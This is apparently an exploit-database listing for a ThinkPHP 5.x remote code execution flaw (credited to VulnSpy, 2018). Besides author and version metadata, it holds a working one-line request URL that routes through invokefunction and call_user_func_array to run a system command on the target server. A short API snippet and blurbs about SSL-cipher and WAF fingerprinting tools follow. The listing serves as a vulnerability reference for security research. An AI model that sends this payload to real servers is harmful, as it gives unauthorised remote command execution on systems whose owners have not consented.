Search for hundreds of thousands of exploits

"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution"

Author

Exploit author

VulnSpy

Platform

Exploit platform

php

Release date

Exploit published date

2018-12-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45978/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.